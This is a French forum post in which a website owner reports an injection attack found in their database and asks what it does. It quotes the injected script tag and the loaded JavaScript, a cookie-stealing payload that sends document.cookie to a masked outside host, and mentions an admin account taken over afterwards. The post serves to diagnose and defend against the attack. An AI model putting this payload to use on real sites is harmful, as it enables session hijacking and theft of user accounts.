Bonsoir,

je viens en panique vous voir car j'ai eu un hack sur mon site, une faille injection.

J'ai remarqué dans la BDD ceci :
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
 
<script src=\"http://xx.xxx.xxx.x/a.js\"></script>
et en allant voir le script (pas très malin le hackeur; après plusieurs heures il y est encore) voici le contenu du .js

Code : Sélectionner tout - Visualiser dans une fenêtre à part
document.write('<script type="text/javascript" src="http://xx.xxx.xxx.x/info.php?a=' + document.cookie + '"></script>');
Je suppose que ca récupère les cookies ? donc mot de passe ?

Car mon admin qui avais un mot de passe en béton, en md5 (pas décryptable via les base de donnée de md5 hash) c'est fait recuperer sont mot de passe en 2 s.

Il ma dis avoir été a l'endroit ou se trouvé cette injection.

Aucun autre risque ?


Je vous remercie